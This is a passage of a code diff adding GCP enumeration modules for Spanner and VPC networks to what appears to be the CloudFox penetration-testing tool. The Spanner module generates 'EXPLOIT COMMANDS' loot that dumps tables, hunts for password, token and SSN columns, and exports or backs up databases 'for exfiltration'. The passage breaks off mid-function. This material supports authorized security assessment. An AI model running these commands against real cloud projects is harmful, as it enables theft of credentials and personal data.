database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + ) + + // === EXPLOIT COMMANDS === + lootFile.Contents += fmt.Sprintf( + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Dump data from tables (replace TABLE_NAME):\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM TABLE_NAME LIMIT 100\"\n\n"+ + "# Dump all rows from a table:\n"+ + "gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql=\"SELECT * FROM TABLE_NAME\" --format=json > /tmp/spanner-dump.json\n\n"+ + "# Search for sensitive data patterns:\n"+ + "gcloud spanner databases 
execute-sql %s --instance=%s --project=%s --sql=\"SELECT TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE LOWER(COLUMN_NAME) LIKE '%%password%%' OR LOWER(COLUMN_NAME) LIKE '%%secret%%' OR LOWER(COLUMN_NAME) LIKE '%%token%%' OR LOWER(COLUMN_NAME) LIKE '%%key%%' OR LOWER(COLUMN_NAME) LIKE '%%credit%%' OR LOWER(COLUMN_NAME) LIKE '%%ssn%%'\"\n\n"+ + "# Create a backup (for exfiltration):\n"+ + "gcloud spanner backups create cloudfox-backup --instance=%s --database=%s --project=%s --expiration-date=$(date -u -d '+7 days' '+%%Y-%%m-%%dT%%H:%%M:%%SZ') --async\n\n"+ + "# Export database to GCS:\n"+ + "gcloud spanner databases export %s --instance=%s --project=%s --output-uri=gs://BUCKET_NAME/spanner-export/\n\n", + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + database.InstanceName, database.Name, database.ProjectID, + database.Name, database.InstanceName, database.ProjectID, + ) +} + +func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *SpannerModule) getInstanceHeader() []string { + return []string{ + "Project", + "Instance", + "Display Name", + "Config", + "Nodes", + "State", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *SpannerModule) getDatabaseHeader() []string { + return []string{ + "Project", + "Instance", + "Database", + "State", + "Encryption", + "KMS Key", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *SpannerModule) instancesToTableBody(instances []spannerservice.SpannerInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + body = append(body, []string{ + 
m.GetProjectName(instance.ProjectID), + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + binding.Role, + binding.Member, + }) + } + } else { + // Instance with no IAM bindings + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + instance.State, + "-", + "-", + }) + } + } + return body +} + +func (m *SpannerModule) databasesToTableBody(databases []spannerservice.SpannerDatabaseInfo) [][]string { + var body [][]string + for _, database := range databases { + kmsKey := "-" + if database.KmsKeyName != "" { + kmsKey = database.KmsKeyName + } + + if len(database.IAMBindings) > 0 { + for _, binding := range database.IAMBindings { + body = append(body, []string{ + m.GetProjectName(database.ProjectID), + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + binding.Role, + binding.Member, + }) + } + } else { + // Database with no IAM bindings + body = append(body, []string{ + m.GetProjectName(database.ProjectID), + database.InstanceName, + database.Name, + database.State, + database.EncryptionType, + kmsKey, + "-", + "-", + }) + } + } + return body +} + +func (m *SpannerModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "spanner-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if databases, ok := m.ProjectDatabases[projectID]; ok && len(databases) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "spanner-databases", + Header: m.getDatabaseHeader(), + Body: m.databasesToTableBody(databases), + }) + } + + return tableFiles +} + +func (m *SpannerModule) 
writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectInstances { + projectIDs[projectID] = true + } + for projectID := range m.ProjectDatabases { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SpannerOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SPANNER_MODULE_NAME) + } +} + +func (m *SpannerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allDatabases := m.getAllDatabases() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ + Name: "spanner-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + if len(allDatabases) > 0 { + tables = append(tables, internal.TableFile{ + Name: "spanner-databases", + Header: m.getDatabaseHeader(), + Body: m.databasesToTableBody(allDatabases), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil 
&& loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := SpannerOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SPANNER_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/spannerenum.go b/gcp/commands/spannerenum.go new file mode 100644 index 00000000..edab5eef --- /dev/null +++ b/gcp/commands/spannerenum.go @@ -0,0 +1,247 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + spannerenumservice "github.com/BishopFox/cloudfox/gcp/services/spannerEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSpannerEnumCommand = &cobra.Command{ + Use: globals.GCP_SPANNERENUM_MODULE_NAME, + Aliases: []string{"spanner-scan"}, + Short: "Scan Spanner database schemas for sensitive table and column names", + Long: `Scan Spanner database DDL for potentially sensitive data. + +Retrieves DDL (CREATE TABLE statements) from all Spanner databases and parses +table names and column names, checking them against sensitive data patterns. 
+ +Detects resources with names suggesting they store: +- Credentials, tokens, or secrets +- PII (SSN, credit cards) +- Financial data (payments, billing, salary) +- Compliance-labeled data (HIPAA, GDPR, PII)`, + Run: runGCPSpannerEnumCommand, +} + +type SpannerEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]spannerenumservice.SensitiveSpannerResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +type SpannerEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SpannerEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SpannerEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPSpannerEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SPANNERENUM_MODULE_NAME) + if err != nil { + return + } + + module := &SpannerEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]spannerenumservice.SensitiveSpannerResource), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *SpannerEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Scanning Spanner database schemas for sensitive data indicators...", globals.GCP_SPANNERENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNERENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive Spanner resources found", globals.GCP_SPANNERENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive Spanner resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), 
globals.GCP_SPANNERENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *SpannerEnumModule) getAllResources() []spannerenumservice.SensitiveSpannerResource { + var all []spannerenumservice.SensitiveSpannerResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *SpannerEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning Spanner in project: %s", projectID), globals.GCP_SPANNERENUM_MODULE_NAME) + } + + svc := spannerenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNERENUM_MODULE_NAME, + fmt.Sprintf("Could not scan Spanner in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "spanner-enum-commands", + Contents: "# Spanner Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s/%s/%s\n# %s\ngcloud spanner databases execute-sql %s --instance=%s --project=%s --sql='SELECT * FROM %s LIMIT 10'\n\n", + r.RiskLevel, r.Category, r.Instance, r.Database, r.Table, + r.Description, + r.Database, r.Instance, projectID, r.Table, + ) + } + } + m.LootMap[projectID]["spanner-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *SpannerEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeSpannerHierarchicalOutput(ctx, logger) + } else { + m.writeSpannerFlatOutput(ctx, logger) + } +} + +func (m *SpannerEnumModule) getHeader() []string { 
+ return []string{"Project", "Instance", "Database", "Table", "Column", "Category", "Risk Level", "Description"} +} + +func (m *SpannerEnumModule) resourcesToTableBody(resources []spannerenumservice.SensitiveSpannerResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Instance, + r.Database, + r.Table, + r.Column, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *SpannerEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "spanner-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *SpannerEnumModule) writeSpannerHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SpannerEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SPANNERENUM_MODULE_NAME) + } +} + +func (m *SpannerEnumModule) writeSpannerFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if 
len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "spanner-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := SpannerEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SPANNERENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go new file mode 100644 index 00000000..1f2f7a23 --- /dev/null +++ b/gcp/commands/vpcnetworks.go @@ -0,0 +1,640 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" + vpcservice "github.com/BishopFox/cloudfox/gcp/services/vpcService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPVPCNetworksCommand = &cobra.Command{ + Use: globals.GCP_VPCNETWORKS_MODULE_NAME, + Aliases: []string{"vpc", "networks", "net"}, + Short: "Enumerate VPC Networks", + Long: `Enumerate VPC Networks and related configurations. 
+ +Features: +- Lists all VPC networks and subnets +- Shows VPC peering connections +- Analyzes routing tables +- Checks for Private Google Access +- Identifies flow log configuration`, + Run: runGCPVPCNetworksCommand, +} + +type VPCNetworksModule struct { + gcpinternal.BaseGCPModule + ProjectNetworks map[string][]vpcservice.VPCNetworkInfo // projectID -> networks + ProjectSubnets map[string][]vpcservice.SubnetInfo // projectID -> subnets + ProjectPeerings map[string][]vpcservice.VPCPeeringInfo // projectID -> peerings + ProjectRoutes map[string][]vpcservice.RouteInfo // projectID -> routes + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type VPCNetworksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCNetworksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCNetworksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCNetworksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCNETWORKS_MODULE_NAME) + if err != nil { + return + } + + module := &VPCNetworksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectNetworks: make(map[string][]vpcservice.VPCNetworkInfo), + ProjectSubnets: make(map[string][]vpcservice.SubnetInfo), + ProjectPeerings: make(map[string][]vpcservice.VPCPeeringInfo), + ProjectRoutes: make(map[string][]vpcservice.RouteInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCNetworksModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_VPCNETWORKS_MODULE_NAME, m.processProject) + + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allRoutes := m.getAllRoutes() + + if len(allNetworks) == 0 { + logger.InfoM("No VPC networks found", 
globals.GCP_VPCNETWORKS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d route(s)", + len(allNetworks), len(allSubnets), len(allPeerings), len(allRoutes)), globals.GCP_VPCNETWORKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCNetworksModule) getAllNetworks() []vpcservice.VPCNetworkInfo { + var all []vpcservice.VPCNetworkInfo + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +func (m *VPCNetworksModule) getAllSubnets() []vpcservice.SubnetInfo { + var all []vpcservice.SubnetInfo + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +func (m *VPCNetworksModule) getAllPeerings() []vpcservice.VPCPeeringInfo { + var all []vpcservice.VPCPeeringInfo + for _, peerings := range m.ProjectPeerings { + all = append(all, peerings...) + } + return all +} + +func (m *VPCNetworksModule) getAllRoutes() []vpcservice.RouteInfo { + var all []vpcservice.RouteInfo + for _, routes := range m.ProjectRoutes { + all = append(all, routes...) 
+ } + return all +} + +func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating VPC networks in project: %s", projectID), globals.GCP_VPCNETWORKS_MODULE_NAME) + } + + svc := vpcservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["vpcnetworks-commands"] = &internal.LootFile{ + Name: "vpcnetworks-commands", + Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n# See also: network-topology-commands for comprehensive topology with NAT/SharedVPC\n\n", + } + } + m.mu.Unlock() + + // Get networks + networks, err := svc.ListVPCNetworks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list VPC networks in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectNetworks[projectID] = networks + for _, network := range networks { + m.addNetworkToLoot(projectID, network) + } + m.mu.Unlock() + } + + // Get subnets + subnets, err := svc.ListSubnets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list subnets in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectSubnets[projectID] = subnets + for _, subnet := range subnets { + m.addSubnetToLoot(projectID, subnet) + } + m.mu.Unlock() + } + + // Get peerings + peerings, err := svc.ListVPCPeerings(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list VPC peerings in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectPeerings[projectID] = peerings 
+ for _, peering := range peerings { + m.addPeeringToLoot(projectID, peering) + } + m.mu.Unlock() + } + + // Get routes + routes, err := svc.ListRoutes(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list routes in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectRoutes[projectID] = routes + m.mu.Unlock() + } +} + +func (m *VPCNetworksModule) addNetworkToLoot(projectID string, network vpcservice.VPCNetworkInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# NETWORK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Routing Mode: %s\n"+ + "# Auto Create Subnets: %v\n"+ + "# Subnets: %d\n"+ + "# Peerings: %d\n"+ + "\n# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --network=%s --project=%s\n\n", + network.Name, + network.ProjectID, + network.RoutingMode, + network.AutoCreateSubnetworks, + len(network.Subnetworks), + len(network.Peerings), + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) +} + +func (m *VPCNetworksModule) addSubnetToLoot(projectID string, subnet vpcservice.SubnetInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# SUBNET: %s (Network: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# 
Region: %s\n"+ + "# CIDR: %s\n"+ + "# Private Google Access: %v\n"+ + "# Flow Logs: %v\n"+ + "\n# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n", + subnet.Name, subnet.Network, + subnet.ProjectID, + subnet.Region, + subnet.IPCidrRange, + subnet.PrivateIPGoogleAccess, + subnet.EnableFlowLogs, + subnet.Name, subnet.Region, subnet.ProjectID, + ) +} + +func (m *VPCNetworksModule) addPeeringToLoot(projectID string, peering vpcservice.VPCPeeringInfo) { + lootFile := m.LootMap[projectID]["vpcnetworks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# PEERING: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# Network: %s -> Peer Network: %s\n"+ + "# Peer Project: %s\n"+ + "# State: %s\n"+ + "# Export Routes: %v, Import Routes: %v\n", + peering.Name, + peering.ProjectID, + peering.Network, peering.PeerNetwork, + peering.PeerProjectID, + peering.State, + peering.ExportCustomRoutes, peering.ImportCustomRoutes, + ) + + // Cross-project peering commands + if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { + lootFile.Contents += fmt.Sprintf( + "\n# Cross-project peering - enumerate peer project:\n"+ + "gcloud compute instances list --project=%s\n"+ + "gcloud compute networks subnets list --project=%s\n\n", + peering.PeerProjectID, + peering.PeerProjectID, + ) + } else { + lootFile.Contents += "\n" + } +} + +func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateVPCNetworksDiagram() + if diagram != "" { + // Add diagram to the first project's loot + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + 
m.LootMap[projectID]["vpcnetworks-diagram"] = &internal.LootFile{ + Name: "vpcnetworks-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["vpcnetworks-diagram"] = &internal.LootFile{ + Name: "vpcnetworks-diagram", + Contents: diagram, + } + } + } + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateVPCNetworksDiagram creates an ASCII visualization of VPC networks +func (m *VPCNetworksModule) generateVPCNetworksDiagram() string { + allNetworks := m.getAllNetworks() + if len(allNetworks) == 0 { + return "" + } + + // Convert networks to diagram service types + diagramNetworks := make([]diagramservice.NetworkInfo, 0, len(allNetworks)) + for _, n := range allNetworks { + diagramNetworks = append(diagramNetworks, diagramservice.NetworkInfo{ + Name: n.Name, + ProjectID: n.ProjectID, + RoutingMode: n.RoutingMode, + MTU: 0, // VPCNetworkInfo doesn't have MTU + IsSharedVPC: false, + SharedVPCRole: "", + PeeringCount: len(n.Peerings), + }) + } + + // Build subnets by network + subnetsByNetwork := make(map[string][]diagramservice.SubnetInfo) + for _, s := range m.getAllSubnets() { + key := s.ProjectID + "/" + s.Network + subnetsByNetwork[key] = append(subnetsByNetwork[key], diagramservice.SubnetInfo{ + Name: s.Name, + Region: s.Region, + IPCIDRRange: s.IPCidrRange, + PrivateIPGoogleAccess: s.PrivateIPGoogleAccess, + FlowLogsEnabled: s.EnableFlowLogs, + }) + } + + // Convert peerings to diagram service types + diagramPeerings := make([]diagramservice.VPCPeeringInfo, 0, len(m.getAllPeerings())) + for _, p 
:= range m.getAllPeerings() { + diagramPeerings = append(diagramPeerings, diagramservice.VPCPeeringInfo{ + Name: p.Name, + Network: p.Network, + PeerNetwork: p.PeerNetwork, + PeerProjectID: p.PeerProjectID, + State: p.State, + ExportRoutes: p.ExportCustomRoutes, + ImportRoutes: p.ImportCustomRoutes, + }) + } + + // Determine project ID for header (use first project if multiple) + projectID := "" + if len(m.ProjectIDs) == 1 { + projectID = m.ProjectIDs[0] + } + + return diagramservice.DrawVPCNetworksDiagram(diagramNetworks, subnetsByNetwork, diagramPeerings, projectID, 90) +} + +func (m *VPCNetworksModule) getNetworksHeader() []string { + return []string{"Project", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} +} + +func (m *VPCNetworksModule) getSubnetsHeader() []string { + return []string{"Project", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} +} + +func (m *VPCNetworksModule) getPeeringsHeader() []string { + return []string{"Project", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} +} + +func (m *VPCNetworksModule) getRoutesHeader() []string { + return []string{"Project", "Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority"} +} + +func (m *VPCNetworksModule) networksToTableBody(networks []vpcservice.VPCNetworkInfo) [][]string { + var body [][]string + for _, network := range networks { + autoSubnets := "No" + if network.AutoCreateSubnetworks { + autoSubnets = "Yes" + } + body = append(body, []string{ + m.GetProjectName(network.ProjectID), + network.Name, + network.RoutingMode, + autoSubnets, + fmt.Sprintf("%d", len(network.Subnetworks)), + fmt.Sprintf("%d", len(network.Peerings)), + }) + } + return body +} + +func (m *VPCNetworksModule) subnetsToTableBody(subnets []vpcservice.SubnetInfo) [][]string { + var body [][]string + for _, subnet := range subnets { + privateAccess := "No" + if subnet.PrivateIPGoogleAccess { + privateAccess = "Yes" + } + flowLogs := 
"No" + if subnet.EnableFlowLogs { + flowLogs = "Yes" + } + body = append(body, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.Name, + subnet.Network, + subnet.Region, + subnet.IPCidrRange, + privateAccess, + flowLogs, + }) + } + return body +} + +func (m *VPCNetworksModule) peeringsToTableBody(peerings []vpcservice.VPCPeeringInfo) [][]string { + var body [][]string + for _, peering := range peerings { + peerProject := peering.PeerProjectID + if peerProject == "" { + peerProject = "-" + } + exportRoutes := "No" + if peering.ExportCustomRoutes { + exportRoutes = "Yes" + } + importRoutes := "No" + if peering.ImportCustomRoutes { + importRoutes = "Yes" + } + body = append(body, []string{ + m.GetProjectName(peering.ProjectID), + peering.Name, + peering.Network, + peering.PeerNetwork, + peerProject, + peering.State, + exportRoutes, + importRoutes, + }) + } + return body +} + +func (m *VPCNetworksModule) routesToTableBody(routes []vpcservice.RouteInfo) [][]string { + var body [][]string + // Filter to custom routes only + for _, route := range routes { + if strings.HasPrefix(route.Name, "default-route-") { + continue + } + body = append(body, []string{ + m.GetProjectName(route.ProjectID), + route.Name, + route.Network, + route.DestRange, + route.NextHopType, + route.NextHop, + fmt.Sprintf("%d", route.Priority), + }) + } + return body +} + +func (m *VPCNetworksModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if networks, ok := m.ProjectNetworks[projectID]; ok && len(networks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(networks), + }) + } + + if subnets, ok := m.ProjectSubnets[projectID]; ok && len(subnets) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(subnets), + }) + } + + if peerings, ok := 
